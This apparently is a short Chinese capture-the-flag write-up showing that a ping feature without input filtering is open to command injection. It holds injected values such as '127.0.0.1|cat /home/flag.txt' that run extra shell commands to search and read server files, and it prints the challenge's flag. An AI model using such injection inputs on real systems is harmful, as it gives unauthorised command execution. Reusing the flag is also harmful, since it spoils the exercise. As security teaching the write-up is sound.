本文深入探讨了Web应用防护系统(WAF)的重要性,解释了为何在实现ping功能时不可或缺。通过实际操作,展示了忽视WAF可能导致的安全风险,并成功获取了一个示例中的flag。
题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
首先去了解一下waf是个啥——
Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
按我现有的知识储备量,先ping一个本地试试,发现可以ping通(如下图)
ping 127.0.0.1
可以ping通的话,再试试搜索一下flag字段看看有没有:
127.0.0.1 |find / -name "*.txt"
找到flag.txt后,输入一下代码来查看flag.txt中的内容
127.0.0.1|cat /home/flag.txt
成功拿到flag: cyberpeace{aa82ad143f24e6fc813e6a8823793325}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
